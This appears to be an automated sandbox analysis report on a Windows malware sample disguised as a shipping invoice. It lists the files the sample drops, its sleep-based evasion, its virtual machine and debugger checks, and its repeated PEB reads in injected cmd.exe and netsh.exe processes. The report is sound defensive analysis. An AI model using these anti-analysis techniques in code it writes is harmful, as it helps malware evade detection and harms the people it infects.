Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\cmd.exe TID: 5796	Thread sleep time: -190000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2928	Thread sleep time: -42000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406469 FindFirstFileA,FindClose,	0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040592E

Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmp	Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00409AF0 LdrLoadDll,

2_2_00409AF0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_10004CBC

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

1_2_1000734B

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08CD6 mov eax, dword ptr fs:[00000030h]	2_2_04C08CD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF14FB mov eax, dword ptr fs:[00000030h]	2_2_04BF14FB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6BC2C mov eax, dword ptr fs:[00000030h]	2_2_04B6BC2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]	2_2_04BF1C06
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]	2_2_04C0740D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5746D mov eax, dword ptr fs:[00000030h]	2_2_04B5746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B635A1 mov eax, dword ptr fs:[00000030h]	2_2_04B635A1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]	2_2_04B32D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BE8DF1 mov eax, dword ptr fs:[00000030h]	2_2_04BE8DF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3AD30 mov eax, dword ptr fs:[00000030h]	2_2_04B3AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]	2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]	2_2_04B5C577
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B57D50 mov eax, dword ptr fs:[00000030h]	2_2_04B57D50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08D34 mov eax, dword ptr fs:[00000030h]	2_2_04C08D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B73D43 mov eax, dword ptr fs:[00000030h]	2_2_04B73D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08ED6 mov eax, dword ptr fs:[00000030h]	2_2_04C08ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB46A7 mov eax, dword ptr fs:[00000030h]	2_2_04BB46A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFE87 mov eax, dword ptr fs:[00000030h]	2_2_04BCFE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B616E0 mov ecx, dword ptr fs:[00000030h]	2_2_04B616E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]	2_2_04C00EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B636CC mov eax, dword ptr fs:[00000030h]	2_2_04B636CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEFEC0 mov eax, dword ptr fs:[00000030h]	2_2_04BEFEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEFE3F mov eax, dword ptr fs:[00000030h]	2_2_04BEFE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6E730 mov eax, dword ptr fs:[00000030h]	2_2_04B6E730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]	2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]	2_2_04B34F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08F6A mov eax, dword ptr fs:[00000030h]	2_2_04C08F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]	2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]	2_2_04BCFF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]	2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]	2_2_04C0070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4EF40 mov eax, dword ptr fs:[00000030h]	2_2_04B4EF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov ecx, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]	2_2_04B6F0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B790AF mov eax, dword ptr fs:[00000030h]	2_2_04B790AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39080 mov eax, dword ptr fs:[00000030h]	2_2_04B39080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]	2_2_04B4B02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]	2_2_04BB7016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C01074 mov eax, dword ptr fs:[00000030h]	2_2_04C01074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF2073 mov eax, dword ptr fs:[00000030h]	2_2_04BF2073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6A185 mov eax, dword ptr fs:[00000030h]	2_2_04B6A185
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5C182 mov eax, dword ptr fs:[00000030h]	2_2_04B5C182
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]	2_2_04B3B1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120 mov ecx, dword ptr fs:[00000030h]	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]	2_2_04B39100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]	2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]	2_2_04B3B171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]	2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]	2_2_04B5B944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]	2_2_04B352A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]	2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]	2_2_04B6D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]	2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]	2_2_04BEB260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]	2_2_04B39240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF138A mov eax, dword ptr fs:[00000030h]	2_2_04BF138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C05BA5 mov eax, dword ptr fs:[00000030h]	2_2_04C05BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C08B58 mov eax, dword ptr fs:[00000030h]	2_2_04C08B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF131B mov eax, dword ptr fs:[00000030h]	2_2_04BF131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00800000 mov eax, dword ptr fs:[00000030h]	2_2_00800000
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00800CE4 mov edi, dword ptr fs:[00000030h]	2_2_00800CE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00802C5D mov eax, dword ptr fs:[00000030h]	2_2_00802C5D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00804E70 mov eax, dword ptr fs:[00000030h]	2_2_00804E70
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]	9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]	9_2_03733B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0370DB60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8B58 mov eax, dword ptr fs:[00000030h]	9_2_037D8B58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370F358 mov eax, dword ptr fs:[00000030h]	9_2_0370F358
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370DB40 mov eax, dword ptr fs:[00000030h]	9_2_0370DB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C131B mov eax, dword ptr fs:[00000030h]	9_2_037C131B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]	9_2_037303E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3 mov eax, dword ptr fs:[00000030h]	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0372DBE9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]	9_2_037853CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]	9_2_037853CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D5BA5 mov eax, dword ptr fs:[00000030h]	9_2_037D5BA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373B390 mov eax, dword ptr fs:[00000030h]	9_2_0373B390
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732397 mov eax, dword ptr fs:[00000030h]	9_2_03732397
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C138A mov eax, dword ptr fs:[00000030h]	9_2_037C138A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BD380 mov ecx, dword ptr fs:[00000030h]	9_2_037BD380
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]	9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]	9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374927A mov eax, dword ptr fs:[00000030h]	9_2_0374927A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]	9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]	9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8A62 mov eax, dword ptr fs:[00000030h]	9_2_037D8A62
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CEA55 mov eax, dword ptr fs:[00000030h]	9_2_037CEA55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03794257 mov eax, dword ptr fs:[00000030h]	9_2_03794257
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]	9_2_03744A2C
